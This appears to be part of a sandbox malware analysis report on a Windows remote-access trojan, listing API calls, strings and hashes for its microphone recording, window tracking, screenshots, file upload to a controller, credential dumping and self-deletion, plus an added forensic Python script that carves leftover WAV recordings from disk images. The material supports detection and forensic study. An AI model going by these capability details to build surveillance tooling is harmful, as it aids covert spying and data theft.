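The two functions above are the audio-capture path: the first drives the recording through mciSendString ("open ... alias audio", "play audio", "pause", "resume", "status audio mode", "stop", "close"), the second writes the result to disk with thirteen consecutive WriteFile calls of 4,4,4,4,4,2,2,4,4,2,2,4,4 bytes, which is exactly a 44-byte PCM WAV header ("RIFF", size, "WAVE", "fmt ", 16, format fields, "data", size). The 2/4/2-byte writes from 00471B02, 00471B04 and 00471B0E are at the nChannels, nSamplesPerSec and wBitsPerSample offsets of a WAVEFORMATEX, consistent with a format structure kept at 00471B00. The Python below is an added forensic helper, not code from the sample or from Joe Sandbox: it rebuilds that header field by field in the same order, parses it back with consistency checks, and carves such headers out of a raw byte image so recordings the RAT left behind (or already deleted) can be located and their length estimated. The byte image and the 8 kHz / 16-bit / mono parameters are constructed for the example; the sample's actual capture format is not stated in the report.

```python
import struct

# Field order and widths copied from the thirteen WriteFile calls listed above.
HEADER_STRUCT = struct.Struct("<4sI4s4sIHHIIHH4sI")
HEADER_SIZE = HEADER_STRUCT.size  # 44
FIELDS = ("riff", "riff_size", "wave", "fmt", "fmt_size", "format_tag", "channels",
          "sample_rate", "byte_rate", "block_align", "bits_per_sample",
          "data", "data_size")


def build_wav_header(data_size, channels=1, sample_rate=8000, bits_per_sample=16):
    """Emit the header in the same field order the sample writes it."""
    block_align = channels * bits_per_sample // 8
    byte_rate = sample_rate * block_align
    return HEADER_STRUCT.pack(b"RIFF", 36 + data_size, b"WAVE",
                              b"fmt ", 16, 1, channels, sample_rate,
                              byte_rate, block_align, bits_per_sample,
                              b"data", data_size)


def parse_wav_header(blob):
    """Return the header fields as a dict, or None if blob is not a PCM WAV header.
    h['consistent'] is True only when the derived fields agree with each other,
    which weeds out random 'RIFF' hits when carving."""
    if len(blob) < HEADER_SIZE:
        return None
    h = dict(zip(FIELDS, HEADER_STRUCT.unpack_from(blob)))
    if (h["riff"], h["wave"], h["fmt"], h["data"]) != (b"RIFF", b"WAVE", b"fmt ", b"data"):
        return None
    expected_align = h["channels"] * h["bits_per_sample"] // 8
    h["consistent"] = (
        h["fmt_size"] == 16 and h["format_tag"] == 1          # plain PCM
        and h["channels"] in (1, 2) and expected_align > 0
        and h["block_align"] == expected_align
        and h["byte_rate"] == h["sample_rate"] * expected_align
        and h["riff_size"] == 36 + h["data_size"]
    )
    return h


def duration_seconds(h):
    """Length of the recording implied by the data chunk size."""
    return h["data_size"] / h["byte_rate"]


def carve_wav_headers(image):
    """Scan a raw byte image (e.g. unallocated space from the host) for
    consistent PCM WAV headers; returns [(offset, header_dict), ...]."""
    hits = []
    pos = image.find(b"RIFF")
    while pos != -1:
        h = parse_wav_header(image[pos:pos + HEADER_SIZE])
        if h is not None and h["consistent"]:
            hits.append((pos, h))
        pos = image.find(b"RIFF", pos + 1)
    return hits


# Constructed sample image: junk, then one second of silence as 8 kHz /
# 16-bit / mono (16000 PCM bytes), then a stray 'RIFF' that must not match.
SAMPLE_IMAGE = (b"\x00junk\xff" + build_wav_header(16000, 1, 8000, 16)
                + b"\x00" * 16000 + b"RIFFnotawav")

if __name__ == "__main__":
    for off, h in carve_wav_headers(SAMPLE_IMAGE):
        print(f"WAV at offset {off}: {h['channels']} ch, {h['sample_rate']} Hz, "
              f"{h['bits_per_sample']}-bit, {duration_seconds(h):.2f} s")
```

The consistency check is what makes carving usable on a whole disk image: "RIFF" appears in many unrelated files, but a header whose byte rate, block alignment and chunk sizes all agree is almost always a real recording, and data_size / byte_rate then gives how long the microphone was captured.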
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\4XYAW8PbZH.exe,00000001,004068B2,C:\Users\user\Desktop\4XYAW8PbZH.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\4XYAW8PbZH.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                                                                                              • API String ID: 1646373207-1852942174
                                                                                                                                                                                              • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                                                                                              • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
APIs
• lstrlenW.KERNEL32(?), ref: 0041B1E6
• _memcmp.LIBVCRUNTIME ref: 0041B1FE
• lstrlenW.KERNEL32(?), ref: 0041B217
• FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B252
• GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B265
• QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B2A9
• lstrcmpW.KERNEL32(?,?), ref: 0041B2C4
• FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2DC
• _wcslen.LIBCMT ref: 0041B2EB
• FindVolumeClose.KERNEL32(?), ref: 0041B30B
• GetLastError.KERNEL32 ref: 0041B323
• GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B350
• lstrcatW.KERNEL32(?,?), ref: 0041B369
• lstrcpyW.KERNEL32(?,?), ref: 0041B378
• GetLastError.KERNEL32 ref: 0041B380
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
• String ID: ?
• API String ID: 3941738427-1684325040
• Opcode ID: 6a4cb5ae61c4e1df440fc7f8de9d62bda0aaac365b66e324bb944b49d49d109f
• Instruction ID: cf02e0f6f7b7a0e02f5bf76754478950043962dc0518326da89db1c5b002f683
• Opcode Fuzzy Hash: 6a4cb5ae61c4e1df440fc7f8de9d62bda0aaac365b66e324bb944b49d49d109f
• Instruction Fuzzy Hash: CC4163715087099BD7209FA0EC889EBB7E8EF44755F00093BF951C2261E778C998C7D6
APIs
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: _free$EnvironmentVariable$_wcschr
• String ID:
• API String ID: 3899193279-0
• Opcode ID: 7acce36c14b6035b1c2eb814a55043d454006441e01e78848d5c2bc81b6dc77b
• Instruction ID: 310171947c9992e3776b826429fe42b14e002c37e8c837d056816c81c4ebeb3e
• Opcode Fuzzy Hash: 7acce36c14b6035b1c2eb814a55043d454006441e01e78848d5c2bc81b6dc77b
• Instruction Fuzzy Hash: A7D13A71900310AFFB35AF7B888266E77A4BF06328F05416FF905A7381E6799D418B99
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
  • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB6F
  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
• Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
• Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
• Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
• DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
• DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
• DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
• Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
• Sleep.KERNEL32(00000064), ref: 00412060
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
• String ID: /stext "$HDG$HDG$>G$>G
• API String ID: 1223786279-3931108886
• Opcode ID: 7d1c0c83bcbb3496ccda6e2cb47db5f4ac60100c7951170ebf23ef22ff8d459f
• Instruction ID: 0ab8a3329a483972d05e881652f5f37e7f84d863b53285be69f93207c3ffadf7
• Opcode Fuzzy Hash: 7d1c0c83bcbb3496ccda6e2cb47db5f4ac60100c7951170ebf23ef22ff8d459f
• Instruction Fuzzy Hash: 890243311083414AC325FB61D891AEFB7D5AFD4308F50493FF98A931E2EF785A49C69A
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
• LoadLibraryA.KERNEL32(?), ref: 00413EC8
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
• FreeLibrary.KERNEL32(00000000), ref: 00413EEF
• LoadLibraryA.KERNEL32(?), ref: 00413F27
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
• FreeLibrary.KERNEL32(00000000), ref: 00413F40
• GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
• FreeLibrary.KERNEL32(00000000), ref: 00413F66
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: Library$AddressFreeProc$Load$DirectorySystem
• String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
• API String ID: 2490988753-744132762
• Opcode ID: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
• Instruction ID: f97e29e5006070a0e8b03c0efb597ee3aef86c3529fe4be05370ae17daaf5a45
• Opcode Fuzzy Hash: 7f25833e8af2b845701e4bccc7340468b757da4176a2c43d0743638068d0b7b5
• Instruction Fuzzy Hash: C331C4B1906315ABD320AF65DC44ACBB7ECEF44745F400A2AF844D7201D778DA858AEE
APIs
• __Init_thread_footer.LIBCMT ref: 0040A456
• Sleep.KERNEL32(000001F4), ref: 0040A461
• GetForegroundWindow.USER32 ref: 0040A467
• GetWindowTextLengthW.USER32(00000000), ref: 0040A470
• GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
• Sleep.KERNEL32(000003E8), ref: 0040A574
  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: Window$SleepText$EventForegroundInit_thread_footerLength
• String ID: [${ User has been idle for $ minutes }$4]G$4]G$4]G$]
• API String ID: 911427763-1497357211
• Opcode ID: 548b9b4b73023f7648ff88d39ff186e7cab5520984c04480b11492e53bc06be4
• Instruction ID: afbd458ed10e5c7c401a96cf43e60d64e5e0c384de04be689a5a7141a0feef4c
• Opcode Fuzzy Hash: 548b9b4b73023f7648ff88d39ff186e7cab5520984c04480b11492e53bc06be4
• Instruction Fuzzy Hash: 8851B1716043409BC224FB21D85AAAE7794BF84318F40493FF846A72D2DF7C9D55869F
APIs
• DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAF9
• GetCursorPos.USER32(?), ref: 0041CB08
• SetForegroundWindow.USER32(?), ref: 0041CB11
• TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB2B
• Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB7C
• ExitProcess.KERNEL32 ref: 0041CB84
• CreatePopupMenu.USER32 ref: 0041CB8A
• AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB9F
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
• String ID: Close
• API String ID: 1657328048-3535843008
• Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
• Instruction ID: 3771bb7a8ff115e6e52fbd1847cd0ce42a02f589590b945df095e749b0e49bf2
• Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
• Instruction Fuzzy Hash: FF212A31148205FFDB064F64FD4EEAA3F25EB04712F004035B906E41B2D7B9EAA1EB18
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _free$Info
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2509303402-0
                                                                                                                                                                                              • Opcode ID: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                                                                                              • Instruction ID: 94cb3ffe265cc5bcc4c1ad3ae65ec97d3e38ea61109583f3198c5827e9e35c68
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                                                                                              • Instruction Fuzzy Hash: 22B19D71900A05AFEF11DFA9C881BEEBBB5FF09304F14416EE855B7342DA799C418B64
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 00407FE9
                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                                                                                                                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                                                                                                                              • API String ID: 1884690901-3066803209
                                                                                                                                                                                              • Opcode ID: 9df5948d7382cf6b602db3d3c6d548fe2f1b10a719ec4cb532c2586deab72b90
                                                                                                                                                                                              • Instruction ID: 4837f293f8898be8956b4197083d1ab2d903a2927be0ecc228378ed3697c5d3b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9df5948d7382cf6b602db3d3c6d548fe2f1b10a719ec4cb532c2586deab72b90
                                                                                                                                                                                              • Instruction Fuzzy Hash: 01B191715083409BC214FB25C892BAFB7E5ABD4314F40493EF889632D2EF789945CB9B
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                                                                                                                • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                                                                                                • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                                                                                                • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                                                                                                • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                                                                                                                                • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,00000000,00000000,00000000), ref: 0040A049
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                                                                              • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                                                                                                                              • API String ID: 3795512280-3163867910
                                                                                                                                                                                              • Opcode ID: 2ad637de4abed7bea4a9c298fd38dc88212808bad0aa3e762a0e0af5c839b2e2
                                                                                                                                                                                              • Instruction ID: 8be46055dc56f0d2ec4b071ca6400761e29966989419bbb2416efbd82a73718c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ad637de4abed7bea4a9c298fd38dc88212808bad0aa3e762a0e0af5c839b2e2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 06517C616043005ACB05BB71D866ABF769AAFD1309F00053FF886B71E2DF3DA945869A
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 004500C1
                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F310
                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F322
                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F334
                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F346
                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F358
                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F36A
                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F37C
                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F38E
                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3A0
                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3B2
                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3C4
                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3D6
                                                                                                                                                                                                • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3E8
                                                                                                                                                                                              • _free.LIBCMT ref: 004500B6
                                                                                                                                                                                                • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                              • _free.LIBCMT ref: 004500D8
                                                                                                                                                                                              • _free.LIBCMT ref: 004500ED
                                                                                                                                                                                              • _free.LIBCMT ref: 004500F8
                                                                                                                                                                                              • _free.LIBCMT ref: 0045011A
                                                                                                                                                                                              • _free.LIBCMT ref: 0045012D
                                                                                                                                                                                              • _free.LIBCMT ref: 0045013B
                                                                                                                                                                                              • _free.LIBCMT ref: 00450146
                                                                                                                                                                                              • _free.LIBCMT ref: 0045017E
                                                                                                                                                                                              • _free.LIBCMT ref: 00450185
                                                                                                                                                                                              • _free.LIBCMT ref: 004501A2
                                                                                                                                                                                              • _free.LIBCMT ref: 004501BA
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                                                              • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                                                                                              • Instruction ID: 71386be3831ae4e36ed8ba8c0666741f952bc44bbd11cc85bbb3aa2ad55dcdb0
                                                                                                                                                                                              • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                                                                                              • Instruction Fuzzy Hash: D5318135600B009FEB30AA39D845B5773E9EF02325F11842FE849E7692DF79AD88C719
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 0041913D
                                                                                                                                                                                              • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041916F
                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191FB
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0041927D
                                                                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 0041928C
                                                                                                                                                                                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419375
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                                                                                              • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                                                                                              • API String ID: 489098229-65789007
                                                                                                                                                                                              • Opcode ID: 987b661f2f94bb4b23b66fd70baf870604e4a68319259e1e5b8a0a3655f2dcde
                                                                                                                                                                                              • Instruction ID: 451d4021779863bb8065bd5e36f4a774b326d3833db1a6038cb7dac0f018a91b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 987b661f2f94bb4b23b66fd70baf870604e4a68319259e1e5b8a0a3655f2dcde
                                                                                                                                                                                              • Instruction Fuzzy Hash: 56519071A002449ACB14BBB5D866AFE7BA9AB45304F00407FF849B71D2EF3C5D85C799
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                                                                              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                                                                              • API String ID: 994465650-2151626615
                                                                                                                                                                                              • Opcode ID: 0e18f61abc9e3d8a2747cabaf845d162c66a56537a1401371773013c123a1612
                                                                                                                                                                                              • Instruction ID: feeaa4dc0a5480c3be004408dd81f6e2390fe6c9429734df96c13844dfc6b1ca
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e18f61abc9e3d8a2747cabaf845d162c66a56537a1401371773013c123a1612
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E4116B1B002026BCB04B77A8C4B66E7A55AB81354B40016FE901676D3FE79AD6087DF
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                                                                                                                                                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                                                                                                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                                                                                                                                                                • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                                                                                                                                                                • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
